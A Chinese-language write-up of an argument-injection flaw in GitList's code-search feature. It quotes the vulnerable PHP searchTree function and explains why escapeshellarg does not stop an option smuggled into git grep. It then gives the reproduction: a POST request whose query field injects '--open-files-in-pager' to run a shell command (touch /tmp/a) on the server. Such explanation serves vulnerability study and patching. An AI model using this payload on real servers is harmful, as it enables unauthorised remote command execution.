Gitlist
gitlist是一款使用PHP开发的图形化git仓库查看工具。
思路
在用户对仓库中代码进行搜索的时候,gitlist将调用git grep命令:
public function searchTree($query, $branch)
{
if (empty($query)) {
return null;
}
$query = escapeshellarg($query);
try {
$results = $this->getClient()->run($this, "grep -i --line-number {
$query} $branch");
} catch (\RuntimeException $e) {
return false;
}
其中,$query是搜索的关键字,$branch是搜索的分支,知道grep函数的应该就能看懂,从分支里面搜索关键字。
为什么会出现这个漏洞,首先这里经过escapeshellarg处理后就会变成能正常执行的shell参数,如果用户输入的$query = --open-files-in-pager=id;是作为-e的参数去执行,那就是正常的,也就是说这只是一个字符串,一个附带的参数值,就像这样
git grep -i --line-number -e '--open-files-in-pager=id;' master
但--open-files-in-pager=id;如果直接作为grep的参数,那就可以执行<id>命令
git grep -i --line-number --open-files-in-pager=id; master
对于两个参数的解释看手册git-grep(1) Manual Page
漏洞复现
这里我们改成POST包,访问/example/tree/a/search,其中example是项目名称,需要是目标gitlist上一个已存在的项目;a在正常情况下应该是分支的名称,也就是"grep -i --line-number {$query} $branch"中的$branch,但因为我们的$query被当成了一个参数,所以$branch就应该被当做搜索的关键字,关键字如下。
抓包添加POST参数
query=--open-files-in-pager=touch /tmp/a
进入后台查看,执行成功
